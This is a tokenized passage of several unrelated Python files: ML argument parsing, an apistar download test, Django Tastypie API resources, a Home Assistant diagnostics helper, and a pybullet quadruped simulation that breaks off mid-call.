conversion" )<line_sep># Arguments related to server. group.add_argument("--conversion.bucket-name" type=str help="Model job's bucket name")<line_sep>group.add_argument("--conversion.task-id" type=str help="Model job's id")<line_sep>group.add_argument("--conversion.viewers" type=str nargs="+" default=<none> help="Users who can view your models on server" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><def_stmt>get_bencmarking_arguments <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep># group=parser.add_argument_group("Benchmarking arguments")<line_sep>group.add_argument("--benchmark.batch-size" type=int default=1 help="Batch size for benchmarking" )<line_sep>group.add_argument("--benchmark.warmup-iter" type=int default=10 help="Warm-up iterations")<line_sep>group.add_argument("--benchmark.n-iter" type=int default=100 help="Number of iterations for benchmarking" )<line_sep>group.add_argument("--benchmark.use-jit-model" action="store_true" help="Convert the model to JIT and then benchmark it" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><def_stmt>get_segmentation_eval_arguments <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep>group=parser.add_argument_group("Segmentation evaluation related arguments")<line_sep>group.add_argument("--evaluation.segmentation.apply-color-map" action="store_true" help="Apply color map to different classes in segmentation masks. Useful in visualization "<concat>"+ some competitions (e.g, PASCAL VOC) accept submissions with colored segmentation masks" )<line_sep>group.add_argument("--evaluation.segmentation.save-overlay-rgb-pred" action="store_true" help="enable this flag to visualize predicted masks on top of input image" )<line_sep>group.add_argument("--evaluation.segmentation.save-masks" action="store_true" help="save predicted masks without colormaps. Useful for submitting to "<concat>"competitions like Cityscapes" )<line_sep>group.add_argument("--evaluation.segmentation.overlay-mask-weight" default=0.5 type=float help="Contribution of mask when overlaying on top of RGB image. " )<line_sep>group.add_argument("--evaluation.segmentation.mode" type=str default="validation_set" required=<false> choices=["single_image" "image_folder" "validation_set"] help="Contribution of mask when overlaying on top of RGB image. " )<line_sep>group.add_argument("--evaluation.segmentation.path" type=str default=<none> help="Path of the image or image folder (only required for single_image and image_folder modes)" )<line_sep>group.add_argument("--evaluation.segmentation.num-classes" type=str default=<none> help="Number of segmentation classes used during training" )<line_sep>group.add_argument("--evaluation.segmentation.resize-input-images" action="store_true" help="Resize input images" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><def_stmt>get_detection_eval_arguments <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep>group=parser.add_argument_group("Detection evaluation related arguments")<line_sep>group.add_argument("--evaluation.detection.save-overlay-boxes" action="store_true" help="enable this flag to visualize predicted masks on top of input image" )<line_sep>group.add_argument("--evaluation.detection.mode" type=str default="validation_set" required=<false> choices=["single_image" "image_folder" "validation_set"] help="Contribution of mask when overlaying on top of RGB image. " )<line_sep>group.add_argument("--evaluation.detection.path" type=str default=<none> help="Path of the image or image folder (only required for single_image and image_folder modes)" )<line_sep>group.add_argument("--evaluation.detection.num-classes" type=str default=<none> help="Number of segmentation classes used during training" )<line_sep>group.add_argument("--evaluation.detection.resize-input-images" action="store_true" default=<false> help="Resize the input images" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end><def_stmt>get_loss_landscape_args <block_start>parser=get_training_arguments(parse_args=<false>)<line_sep>group=parser.add_argument_group("Loss landscape related arguments")<line_sep>group.add_argument("--loss-landscape.n-points" type=int default=11 help="No. of grid points. Default is 11, so we have 11x11 grid" )<line_sep>group.add_argument("--loss-landscape.min-x" type=float default=-1.0 help="Min. value along x-axis" )<line_sep>group.add_argument("--loss-landscape.max-x" type=float default=1.0 help="Max. value along x-axis" )<line_sep>group.add_argument("--loss-landscape.min-y" type=float default=-1.0 help="Min. value along y-axis" )<line_sep>group.add_argument("--loss-landscape.max-y" type=float default=1.0 help="Max. value along y-axis" )<line_sep># parse args opts=parser.parse_args()<line_sep>opts=load_config_file(opts)<line_sep><return>opts<block_end>
<import_stmt>os<import_from_stmt>starlette.applications Starlette<import_from_stmt>starlette.responses PlainTextResponse Response<import_from_stmt>starlette.testclient TestClient<import_from_stmt>apistar.client Client decoders<line_sep>app=Starlette()<line_sep>@app.route("/text-response/")<def_stmt>text_response request<block_start><return>PlainTextResponse("hello, world")<block_end>@app.route("/file-response/")<def_stmt>file_response request<block_start>headers={"Content-Type":"image/png" "Content-Disposition":'attachment; filename="filename.png"' }<line_sep><return>Response(b"<somedata>" headers=headers)<block_end>@app.route("/file-response-url-filename/name.png")<def_stmt>file_response_url_filename request<block_start>headers={"Content-Type":"image/png" "Content-Disposition":"attachment"}<line_sep><return>Response(b"<somedata>" headers=headers)<block_end>@app.route("/file-response-no-extension/name")<def_stmt>file_response_no_extension request<block_start>headers={"Content-Type":"image/png" "Content-Disposition":"attachment"}<line_sep><return>Response(b"<somedata>" headers=headers)<block_end>@app.route("/")<def_stmt>file_response_no_name request<block_start>headers={"Content-Type":"image/png" "Content-Disposition":"attachment"}<line_sep><return>Response(b"<somedata>" headers=headers)<block_end>schema={"openapi":"3.0.0" "info":{"title":"Test API" "version":"1.0"} "servers":[{"url":"http://testserver"}] "paths":{"/text-response/":{"get":{"operationId":"text-response"}} "/file-response/":{"get":{"operationId":"file-response"}} "/file-response-url-filename/name.png":{"get":{"operationId":"file-response-url-filename"}} "/file-response-no-extension/name":{"get":{"operationId":"file-response-no-extension"}} "/":{"get":{"operationId":"file-response-no-name"}} } }<def_stmt>test_text_response <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("text-response")<assert_stmt>data<eq>"hello, world"<block_end><def_stmt>test_file_response <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("file-response")<assert_stmt>os.path.basename(data.name)<eq>"filename.png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end><def_stmt>test_file_response_url_filename <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("file-response-url-filename")<assert_stmt>os.path.basename(data.name)<eq>"name.png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end><def_stmt>test_file_response_no_extension <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("file-response-no-extension")<assert_stmt>os.path.basename(data.name)<eq>"name.png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end><def_stmt>test_file_response_no_name <block_start>client=Client(schema session=TestClient(app))<line_sep>data=client.request("file-response-no-name")<assert_stmt>os.path.basename(data.name)<eq>"download.png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end><def_stmt>test_unique_filename tmpdir<block_start>client=Client(schema session=TestClient(app) decoders=[decoders.DownloadDecoder(tmpdir)])<line_sep>data=client.request("file-response")<assert_stmt>os.path.basename(data.name)<eq>"filename.png"<assert_stmt>data.read()<eq>b"<somedata>"<line_sep>data=client.request("file-response")<assert_stmt>os.path.basename(data.name)<eq>"filename (1).png"<assert_stmt>data.read()<eq>b"<somedata>"<block_end>
# -*- coding: utf-8 -*- <import_stmt>logging<import_from_stmt>celery.result AsyncResult<import_from_stmt>tastypie.resources ModelResource ALL_WITH_RELATIONS Resource<import_from_stmt>tastypie fields<import_from_stmt>tastypie.fields ListField<import_from_stmt>tastypie.authentication ApiKeyAuthentication MultiAuthentication SessionAuthentication<import_from_stmt>vaas.external.api ExtendedDjangoAuthorization<as>DjangoAuthorization<import_from_stmt>vaas.external.tasty_validation ModelCleanedDataFormValidation<import_from_stmt>vaas.external.serializer PrettyJSONSerializer<import_from_stmt>vaas.cluster.api DcResource<import_from_stmt>vaas.manager.forms ProbeModelForm DirectorModelForm BackendModelForm TimeProfileModelForm<import_from_stmt>vaas.manager.models Backend Probe Director TimeProfile ReloadTask<import_from_stmt>vaas.monitor.models BackendStatus<import_from_stmt>vaas.external.oauth VaasMultiAuthentication<line_sep>logger=logging.getLogger('vaas')<class_stmt>TimeProfileResource(ModelResource)<block_start><class_stmt>Meta<block_start>queryset=TimeProfile.objects.all()<line_sep>resource_name='time_profile'<line_sep>serializer=PrettyJSONSerializer()<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication())<line_sep>validation=ModelCleanedDataFormValidation(form_class=TimeProfileModelForm)<line_sep>always_return_data=<true><line_sep>filtering={'max_connections':['exact'] 'connect_timeout':['exact'] 'first_byte_timeout':['exact'] 'between_bytes_timeout':['exact']}<block_end><block_end><class_stmt>ProbeResource(ModelResource)<block_start><class_stmt>Meta<block_start>queryset=Probe.objects.all()<line_sep>resource_name='probe'<line_sep>serializer=PrettyJSONSerializer()<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication())<line_sep>validation=ModelCleanedDataFormValidation(form_class=ProbeModelForm)<line_sep>always_return_data=<true><line_sep>filtering={'name':['exact'] 'url':['exact'] 'expected_response':['exact']}<block_end><block_end><class_stmt>DirectorResource(ModelResource)<block_start>probe=fields.ForeignKey(ProbeResource 'probe' full=<true>)<line_sep>time_profile=fields.ForeignKey(TimeProfileResource 'time_profile' full=<true>)<line_sep>backends=fields.ToManyField('vaas.manager.api.BackendResource' 'backends' null=<true>)<line_sep>cluster=fields.ToManyField('vaas.cluster.api.LogicalClusterResource' 'cluster' null=<true> full=<true>)<class_stmt>Meta<block_start>queryset=Director.objects.all()<line_sep>resource_name='director'<line_sep>serializer=PrettyJSONSerializer()<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication() SessionAuthentication())<line_sep>validation=ModelCleanedDataFormValidation(form_class=DirectorModelForm)<line_sep>always_return_data=<true><line_sep>filtering={'name':['exact'] 'enabled':['exact'] 'probe':ALL_WITH_RELATIONS 'cluster':ALL_WITH_RELATIONS 'service':['exact'] 'virtual':['exact'] 'service_tag':['exact'] 'reachable_via_service_mesh':['exact'] }<block_end><def_stmt>save_m2m self bundle<block_start><try_stmt><block_start>new_uris=bundle.obj.new_clusters_uris<line_sep>bundle.obj.new_clusters=[cluster.obj<for>cluster bundle.data['cluster']<if>cluster.data['resource_uri']<in>new_uris]<line_sep>logger.info("[DirectorResource.save_m2m()] new_clusters = %s" bundle.obj.new_clusters)<block_end><except_stmt>(AttributeError KeyError)<block_start><pass><block_end><return>super(DirectorResource self).save_m2m(bundle)<block_end><def_stmt>update_in_place self request original_bundle new_data<block_start><try_stmt><block_start>original_bundle.obj.old_clusters=list(original_bundle.obj.cluster.all())<block_end><except_stmt>AttributeError<block_start>original_bundle.obj.old_clusters=[]<block_end>logger.info("[DirectorResource.update_in_place()] old_clusters = %s" original_bundle.obj.old_clusters)<try_stmt><block_start>original_bundle.obj.new_clusters_uris=new_data['cluster']<block_end><except_stmt>KeyError<block_start>original_bundle.obj.new_clusters_uris=[]<block_end>original_bundle.obj.new_data=new_data<line_sep><return>super(DirectorResource self).update_in_place(request original_bundle new_data)<block_end><block_end><class_stmt>BackendResource(ModelResource)<block_start>dc=fields.ForeignKey(DcResource 'dc' full=<true>)<line_sep>director=fields.ForeignKey(DirectorResource 'director')<line_sep>tags=ListField()<class_stmt>Meta<block_start>queryset=Backend.objects.all()<line_sep>resource_name='backend'<line_sep>serializer=PrettyJSONSerializer()<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication())<line_sep>validation=ModelCleanedDataFormValidation(form_class=BackendModelForm)<line_sep>always_return_data=<true><line_sep>filtering={'dc':ALL_WITH_RELATIONS 'director':ALL_WITH_RELATIONS 'address':['exact'] 'port':['exact']}<block_end><def_stmt>dehydrate self bundle<block_start>status=BackendStatus.objects.filter(address=bundle.data['address'] port=bundle.data['port'])<if_stmt>len(status)<g>0<block_start>bundle.data['status']=status[0].status<block_end><else_stmt><block_start>bundle.data['status']="Unknown"<block_end>bundle.data['time_profile']={'max_connections':bundle.obj.director.time_profile.max_connections 'connect_timeout':bundle.obj.director.time_profile.connect_timeout 'first_byte_timeout':bundle.obj.director.time_profile.first_byte_timeout 'between_bytes_timeout':bundle.obj.director.time_profile.between_bytes_timeout}<line_sep><return>bundle<block_end><def_stmt>build_filters self filters=<none> ignore_bad_filters=<false><block_start><if_stmt>filters<is><none><block_start>filters={}<block_end>orm_filters=super(BackendResource self).build_filters(filters ignore_bad_filters=ignore_bad_filters)<if_stmt>'tag'<in>filters<block_start>orm_filters['tags__name__in']=filters['tag'].split(',')<block_end><return>orm_filters<block_end><def_stmt>dehydrate_tags self bundle<block_start><return>list(map(str bundle.obj.tags.all()))<block_end><def_stmt>hydrate_tags self bundle<block_start><if_stmt>isinstance(bundle.data.get('tags') list)<block_start>bundle.data['tags']=','.join(bundle.data['tags'])<block_end><elif_stmt>bundle.data.get('tags')<is><none><block_start>bundle.data['tags']=''<block_end><return>bundle<block_end><def_stmt>save_m2m self bundle<block_start>tags=bundle.data.get('tags' [])<line_sep>bundle.obj.tags.set(*tags)<line_sep><return>super(BackendResource self).save_m2m(bundle)<block_end><block_end><class_stmt>ReloadTaskResource(Resource)<block_start>status=fields.CharField(attribute='status')<line_sep>info=fields.CharField(attribute='info')<class_stmt>Meta<block_start>resource_name='task'<line_sep>list_allowed_methods=['get']<line_sep>authorization=DjangoAuthorization()<line_sep>authentication=VaasMultiAuthentication(ApiKeyAuthentication())<line_sep>fields=['status' 'info']<line_sep>include_resource_uri=<true><block_end><def_stmt>obj_get self bundle **kwargs<block_start>task=AsyncResult(kwargs['pk'])<line_sep><return>ReloadTask(kwargs['pk'] task.status '{}'.format(task.info))<block_end><def_stmt>get_object_list self request<block_start><return><none><block_end><block_end>
"""Diagnostics support for Launch Library."""<import_from_future_stmt> annotations<import_from_stmt>typing Any<import_from_stmt>pylaunches.objects.event Event<import_from_stmt>pylaunches.objects.launch Launch<import_from_stmt>homeassistant.config_entries ConfigEntry<import_from_stmt>homeassistant.core HomeAssistant<import_from_stmt>homeassistant.helpers.update_coordinator DataUpdateCoordinator<import_from_stmt>. LaunchLibraryData<import_from_stmt>.const DOMAIN<async_keyword><def_stmt>async_get_config_entry_diagnostics hass:HomeAssistant entry:ConfigEntry <arrow>dict[str Any]<block_start>"""Return diagnostics for a config entry."""<line_sep>coordinator:DataUpdateCoordinator[LaunchLibraryData]=hass.data[DOMAIN]<if_stmt>coordinator.data<is><none><block_start><return>{}<block_end><def_stmt>_first_element data:list[Launch|Event]<arrow>dict[str Any]|<none><block_start><if_stmt><not>data<block_start><return><none><block_end><return>data[0].raw_data_contents<block_end><return>{"next_launch":_first_element(coordinator.data["upcoming_launches"]) "starship_launch":_first_element(coordinator.data["starship_events"].upcoming.launches) "starship_event":_first_element(coordinator.data["starship_events"].upcoming.events) }<block_end>
<import_stmt>pybullet<as>p<import_stmt>time<import_stmt>math<import_stmt>pybullet_data<def_stmt>drawInertiaBox parentUid parentLinkIndex color<block_start>dyn=p.getDynamicsInfo(parentUid parentLinkIndex)<line_sep>mass=dyn[0]<line_sep>frictionCoeff=dyn[1]<line_sep>inertia=dyn[2]<if_stmt>(mass<g>0)<block_start>Ixx=inertia[0]<line_sep>Iyy=inertia[1]<line_sep>Izz=inertia[2]<line_sep>boxScaleX=0.5<times>math.sqrt(6<times>(Izz+Iyy-Ixx)/mass)<line_sep>boxScaleY=0.5<times>math.sqrt(6<times>(Izz+Ixx-Iyy)/mass)<line_sep>boxScaleZ=0.5<times>math.sqrt(6<times>(Ixx+Iyy-Izz)/mass)<line_sep>halfExtents=[boxScaleX boxScaleY boxScaleZ]<line_sep>pts=[[halfExtents[0] halfExtents[1] halfExtents[2]] [-halfExtents[0] halfExtents[1] halfExtents[2]] [halfExtents[0] -halfExtents[1] halfExtents[2]] [-halfExtents[0] -halfExtents[1] halfExtents[2]] [halfExtents[0] halfExtents[1] -halfExtents[2]] [-halfExtents[0] halfExtents[1] -halfExtents[2]] [halfExtents[0] -halfExtents[1] -halfExtents[2]] [-halfExtents[0] -halfExtents[1] -halfExtents[2]]]<line_sep>p.addUserDebugLine(pts[0] pts[1] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[1] pts[3] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[3] pts[2] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[2] pts[0] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[0] pts[4] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[1] pts[5] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[2] pts[6] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[3] pts[7] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[4+0] pts[4+1] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[4+1] pts[4+3] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[4+3] pts[4+2] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<line_sep>p.addUserDebugLine(pts[4+2] pts[4+0] color 1 parentObjectUniqueId=parentUid parentLinkIndex=parentLinkIndex)<block_end><block_end>toeConstraint=<true><line_sep>useMaximalCoordinates=<false><line_sep>useRealTime=0<line_sep>#the fixedTimeStep and numSolverIterations are the most important parameters to trade-off quality versus performance fixedTimeStep=1./100<line_sep>numSolverIterations=50<if_stmt>(useMaximalCoordinates)<block_start>fixedTimeStep=1./500<line_sep>numSolverIterations=200<block_end>speed=10<line_sep>amplitude=0.8<line_sep>jump_amp=0.5<line_sep>maxForce=3.5<line_sep>kneeFrictionForce=0<line_sep>kp=1<line_sep>kd=.5<line_sep>maxKneeForce=1000<line_sep>physId=p.connect(p.SHARED_MEMORY_GUI)<if_stmt>(physId<l>0)<block_start>p.connect(p.GUI)<block_end>#p.resetSimulation() p.setAdditionalSearchPath(pybullet_data.getDataPath())<line_sep>angle=0# pick in range 0..0.2 radians orn=p.getQuaternionFromEuler([0 angle 0])<line_sep>p.loadURDF("plane.urdf" [0 0 0] orn)<line_sep>p.setPhysicsEngineParameter(numSolverIterations=numSolverIterations)<line_sep>p.startStateLogging(p.STATE_LOGGING_GENERIC_ROBOT "genericlogdata.bin" maxLogDof=16 logFlags=p.STATE_LOG_JOINT_TORQUES)<line_sep>p.setTimeOut(4000000)<line_sep>p.setGravity(0 0 0)<line_sep>p.setTimeStep(fixedTimeStep)<line_sep>orn=p.getQuaternionFromEuler([0 0 0.4])<line_sep>p.setRealTimeSimulation(0)<line_sep>quadruped=p.loadURDF("quadruped/minitaur_v1.urdf" [1 -1 .3] orn useFixedBase=<false> useMaximalCoordinates=useMaximalCoordinates flags=p.URDF_USE_IMPLICIT_CYLINDER)<line_sep>nJoints=p.getNumJoints(quadruped)<line_sep>jointNameToId={}<for_stmt>i range(nJoints)<block_start>jointInfo=p.getJointInfo(quadruped i)<line_sep>jointNameToId[jointInfo[1].decode('UTF-8')]=jointInfo[0]<block_end>motor_front_rightR_joint=jointNameToId['motor_front_rightR_joint']<line_sep>motor_front_rightL_joint=jointNameToId['motor_front_rightL_joint']<line_sep>knee_front_rightL_link=jointNameToId['knee_front_rightL_link']<line_sep>hip_front_rightR_link=jointNameToId['hip_front_rightR_link']<line_sep>knee_front_rightR_link=jointNameToId['knee_front_rightR_link']<line_sep>motor_front_rightL_link=jointNameToId['motor_front_rightL_link']<line_sep>motor_front_leftR_joint=jointNameToId['motor_front_leftR_joint']<line_sep>hip_front_leftR_link=jointNameToId['hip_front_leftR_link']<line_sep>knee_front_leftR_link=jointNameToId['knee_front_leftR_link']<line_sep>motor_front_leftL_joint=jointNameToId['motor_front_leftL_joint']<line_sep>motor_front_leftL_link=jointNameToId['motor_front_leftL_link']<line_sep>knee_front_leftL_link=jointNameToId['knee_front_leftL_link']<line_sep>motor_back_rightR_joint=jointNameToId['motor_back_rightR_joint']<line_sep>hip_rightR_link=jointNameToId['hip_rightR_link']<line_sep>knee_back_rightR_link=jointNameToId['knee_back_rightR_link']<line_sep>motor_back_rightL_joint=jointNameToId['motor_back_rightL_joint']<line_sep>motor_back_rightL_link=jointNameToId['motor_back_rightL_link']<line_sep>knee_back_rightL_link=jointNameToId['knee_back_rightL_link']<line_sep>motor_back_leftR_joint=jointNameToId['motor_back_leftR_joint']<line_sep>hip_leftR_link=jointNameToId['hip_leftR_link']<line_sep>knee_back_leftR_link=jointNameToId['knee_back_leftR_link']<line_sep>motor_back_leftL_joint=jointNameToId['motor_back_leftL_joint']<line_sep>motor_back_leftL_link=jointNameToId['motor_back_leftL_link']<line_sep>knee_back_leftL_link=jointNameToId['knee_back_leftL_link']<line_sep>#fixtorso = p.createConstraint(-1,-1,quadruped,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0,0]) motordir=[-1 -1 -1 -1 1 1 1 1]<line_sep>halfpi=1.57079632679<line_sep>twopi=4<times>halfpi<line_sep>kneeangle=-2.1834<line_sep>dyn=p.getDynamicsInfo(quadruped -1)<line_sep>mass=dyn[0]<line_sep>friction=dyn[1]<line_sep>localInertiaDiagonal=dyn[2]<line_sep>print("localInertiaDiagonal" localInertiaDiagonal)<line_sep>#this is a no-op, just to show the API p.changeDynamics(quadruped -1 localInertiaDiagonal=localInertiaDiagonal)<line_sep>#for i in range (nJoints): # p.changeDynamics(quadruped,i,localInertiaDiagonal=[0.000001,0.000001,0.000001]) drawInertiaBox(quadruped -1 [1 0 0])<line_sep>#drawInertiaBox(quadruped,motor_front_rightR_joint, [1,0,0]) <for_stmt>i range(nJoints)<block_start>drawInertiaBox(quadruped i [0 1 0])<block_end><if_stmt>(useMaximalCoordinates)<block_start>steps=400<for_stmt>aa range(steps)<block_start>p.setJointMotorControl2(quadruped motor_front_leftL_joint p.POSITION_CONTROL motordir[0]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_front_leftR_joint p.POSITION_CONTROL motordir[1]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_back_leftL_joint p.POSITION_CONTROL motordir[2]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_back_leftR_joint p.POSITION_CONTROL motordir[3]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_front_rightL_joint p.POSITION_CONTROL motordir[4]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_front_rightR_joint p.POSITION_CONTROL motordir[5]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_back_rightL_joint p.POSITION_CONTROL motordir[6]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped motor_back_rightR_joint p.POSITION_CONTROL motordir[7]<times>halfpi<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_front_leftL_link p.POSITION_CONTROL motordir[0]<times>(kneeangle+twopi)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_front_leftR_link p.POSITION_CONTROL motordir[1]<times>kneeangle<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_back_leftL_link p.POSITION_CONTROL motordir[2]<times>kneeangle<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_back_leftR_link p.POSITION_CONTROL motordir[3]<times>(kneeangle+twopi)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_front_rightL_link p.POSITION_CONTROL motordir[4]<times>(kneeangle)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_front_rightR_link p.POSITION_CONTROL motordir[5]<times>(kneeangle+twopi)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_back_rightL_link p.POSITION_CONTROL motordir[6]<times>(kneeangle+twopi)<times>float(aa)/steps)<line_sep>p.setJointMotorControl2(quadruped knee_back_rightR_link p.POSITION_CONTROL motordir[7]<times>kneeangle<times>float(aa)/steps)<line_sep>p.stepSimulation()<line_sep>#time.sleep(fixedTimeStep) <block_end><block_end><else_stmt><block_start>p.resetJointState(quadruped motor_front_leftL_joint motordir[0]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_front_leftL_link motordir[0]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_front_leftR_joint motordir[1]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_front_leftR_link motordir[1]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_back_leftL_joint motordir[2]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_back_leftL_link motordir[2]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_back_leftR_joint motordir[3]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_back_leftR_link motordir[3]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_front_rightL_joint motordir[4]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_front_rightL_link motordir[4]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_front_rightR_joint motordir[5]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_front_rightR_link motordir[5]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_back_rightL_joint motordir[6]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_back_rightL_link motordir[6]<times>kneeangle)<line_sep>p.resetJointState(quadruped motor_back_rightR_joint motordir[7]<times>halfpi)<line_sep>p.resetJointState(quadruped knee_back_rightR_link motordir[7]<times>kneeangle)<block_end>#p.getNumJoints(1) <if_stmt>(toeConstraint)<block_start>cid=p.createConstraint(quadruped knee_front_leftR_link quadruped knee_front_leftL_link p.JOINT_POINT2POINT [0 0 0] [0 0.005 0.1] [0 0.01 0.1])<line_sep>p.changeConstraint(cid maxForce=maxKneeForce)<line_sep>cid=p.createConstraint(quadruped knee_front_rightR_link quadruped knee_front_rightL_link p.JOINT_POINT2POINT [0 0 0] [0 0.005 0.1] [0 0.01 0.1])<line_sep>p.changeConstraint(cid maxForce=maxKneeForce)<line_sep>cid=p.createConstraint(quadruped knee_back_leftR_link quadruped knee_back_leftL_link p.JOINT_POINT2POINT [0 0 0] [0 0.005 0.1] [0 0.01 0.1])<line_sep>p.changeConstraint(cid maxForce=maxKneeForce)<line_sep>cid=p.createConstraint(quadruped knee_back_rightR_link quadruped knee_back_rightL_link p.JOINT_POINT2POINT [0 0 0] [0 0.005 0.1] [0 0.01 0.1])<line_sep>p.changeConstraint(cid maxForce=maxKneeForce)<block_end><if_stmt>(1)<block_start>p.setJointMotorControl(quadruped knee_front_leftL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_front_leftR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_front_rightL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_front_rightR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_leftL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_leftR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_leftL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_leftR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_rightL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_rightR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<block_end>p.setGravity(0 0 -10)<line_sep>legnumbering=[motor_front_leftL_joint motor_front_leftR_joint motor_back_leftL_joint motor_back_leftR_joint motor_front_rightL_joint motor_front_rightR_joint motor_back_rightL_joint motor_back_rightR_joint]<for_stmt>i range(8)<block_start>print(legnumbering[i])<block_end>#use the Minitaur leg numbering p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[0] controlMode=p.POSITION_CONTROL targetPosition=motordir[0]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[1] controlMode=p.POSITION_CONTROL targetPosition=motordir[1]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[2] controlMode=p.POSITION_CONTROL targetPosition=motordir[2]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[3] controlMode=p.POSITION_CONTROL targetPosition=motordir[3]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[4] controlMode=p.POSITION_CONTROL targetPosition=motordir[4]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[5] controlMode=p.POSITION_CONTROL targetPosition=motordir[5]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[6] controlMode=p.POSITION_CONTROL targetPosition=motordir[6]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[7] controlMode=p.POSITION_CONTROL targetPosition=motordir[7]<times>1.57 positionGain=kp 